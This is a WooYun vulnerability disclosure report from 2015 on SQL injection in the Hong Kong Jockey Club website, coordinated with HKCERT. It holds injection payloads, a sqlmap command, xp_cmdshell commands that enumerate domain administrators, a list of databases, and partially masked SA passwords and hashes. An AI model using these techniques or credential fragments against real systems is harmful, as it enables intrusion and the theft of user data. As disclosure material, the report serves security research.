香港马会官网存在SQL注入漏洞(可穿透边界防火墙进入内网，可导致博彩用户信息泄露)（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146262

漏洞标题：香港马会官网存在SQL注入漏洞(可穿透边界防火墙进入内网，可导致博彩用户信息泄露)（香港地區）

漏洞作者：猪猪侠

提交时间：2015-10-12 19:49

修复时间：2015-11-27 15:24

公开时间：2015-11-27 15:24

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-12：细节已通知厂商并且等待厂商处理中
2015-10-13：厂商已经确认，细节仅向厂商公开
2015-10-23：细节向核心白帽子及相关领域专家公开
2015-11-02：细节向普通白帽子公开
2015-11-12：细节向实习白帽子公开
2015-11-27：细节向公众公开

简要描述：

香港马会官网存在SQL注入漏洞，可影响网站核心数据：24个数据库。
注入点SA权限，可利用xp_cmdshell执行系统命令，直接获取马会数据库系统权限。
香港马会(http://www.hkjc.com)是于1884年成立的一家私人会所，发展至今已成为亚洲最大、最高级的会员会所之一，六合彩由香港赛马会以“香港马会奖券有限公司”的名义代理接受投注。

详细说明：

#1 受影响网站

#2 SQL注入点
~回显正常 and 1=1

http://**.**.**.**/football/common/proxy/rate-your-players-xml.aspx?uniqueMatchCode=43923 and 1=1

~回显错误 and 1=2

http://**.**.**.**/football/common/proxy/rate-your-players-xml.aspx?uniqueMatchCode=43923 and 1=2

漏洞证明：

#!!!注入点是一个DBA权限的，可以直接执行系统命令

E:\MSSQL10.WCMSDBSQL\MSSQL\Log\ERRORLOG
os-shell>whoami
rhkjc_dm\sqladm
os-shell>net time /domain // 域控服务器
Current time at \\JCDC**.**.**.**

rhkjc_dm\sqladm ,马会最核心的是数据，域控方式启动，等于所有的数据库服务器，都可以使用这个用户以SA权限直接连接。
整个香港马会公司，信息系统用户列表，5000*3，上万用户：

系统管理员列表：

os-shell>net group "Domain Admins" /domain
The request will be processed at a domain controller for domain **.**.**.**.
Group name     Domain Admins    
Comment        Designated administrators of the domain 
Members
-------------------------------------------------------------------------------
Administrator            BITLOCKERADMIN           BIZTALKADM 
COOPS1                   EIADMIN_R                MOMACTION 
ocsadmin                 PIM_HYENA                PIM_SUPERADMIN
SCHEDULEADM              wcmsadmin 
The command completed successfully.

#3 SQLMAP上工具
数据库用户名：CustomUser
当前数据库：CustomDB (用户数据库，怕与香港古惑仔结仇，故不在此描述)

python sqlmap.py -u "http://**.**.**.**/football/common/proxy/rate-your-players-xml.aspx?uniqueMatchCode=43923"

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uniqueMatchCode (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uniqueMatchCode=43923 AND 7912=7912
---
[19:12:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [24]:
[*] CustomDB
[*] iwcommon
[*] iwevent
[*] iwlscspreview
[*] iwlscsruntime
[*] iwlscsruntime02
[*] iwlscsruntime51
[*] iwlscsruntime52
[*] iwlsdisplay
[*] iwreport
[*] iwsitepub
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ts73_iwcommon
[*] ts73_iwlscsruntime
[*] ts73_iwlscsruntime_PRELS01
[*] ts73_iwlscsruntime_PRELS51
[*] ts73_iwlsds
[*] ts73_iwlsds_PRELS01
[*] ts73_iwlsds_PRELS51
[*] ts73_iwsitepub
[*] ts73_iwtsreporting

数据库的SA密码，可以直接使用openDataSource来利用xp_cmdshell远程执行命令；

componentName: CommonServices
jdbc:sqlserver://WCMSDBSQL:40000;databaseName=iwcommon
userName : sa
userPwd  : 8/sPlwrX/T7gu8ztoDx3********
componentName: TSREPORTS
jdbc:sqlserver://WCMSDBSQL:40000;databaseName=iwreport
userName : sa
userPwd  : DYC4vZGy6iJqtwNeHHrjI********
componentName: BasicReports
jdbc:sqlserver://WCMSDBSQL:40000;databaseName=iwcommon
userName : sa
userPwd  : nM3OI6DIrxY1+RjjWTlpo4********

数据库系统密码HASH

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x010093b104fc8426f57ac7a9e67*********396c0ec7be
        header: 0x0100
        salt: 93b104fc
        mixedcase: 8426f57ac7a9e67487f*******96c0ec7be
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x01008d22a249df5ef3b79ed**********9cfc5ff954dd2d0f
        header: 0x0100
        salt: 8d22a249
        mixedcase: df5ef3b79ed321563a********f954dd2d0f
[*] CustomUser [1]:
    password hash: 0x010001eb7a73d3c4b97b224cb********c6fc0443165db
        header: 0x0100
        salt: 01eb7a73
        mixedcase: d3c4b97b224cb02df8259857780c6fc0443165db
[*] sa [1]:
    password hash: 0x010056049b0eb5e2dbc7ad******154592ac25fb5
        header: 0x0100
        salt: 56049b0e
        mixedcase: b5e2dbc7ad5a881ea5329*********ac25fb5

# 由于用户数据敏感，不在本报告中列出

修复方案：

#1 安全过滤

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-10-13 15:23

厂商回复：

已將事件通知有關機構

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146262

漏洞标题：香港马会官网存在SQL注入漏洞(可穿透边界防火墙进入内网，可导致博彩用户信息泄露)（香港地區）

相关厂商：香港赛马会

漏洞作者：猪猪侠

提交时间：2015-10-12 19:49

修复时间：2015-11-27 15:24

公开时间：2015-11-27 15:24

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146262

漏洞标题：香港马会官网存在SQL注入漏洞(可穿透边界防火墙进入内网，可导致博彩用户信息泄露)（香港地區）

相关厂商：香港赛马会

漏洞作者： 猪猪侠

提交时间：2015-10-12 19:49

修复时间：2015-11-27 15:24

公开时间：2015-11-27 15:24

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0146262"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猪猪侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猪猪侠@乌云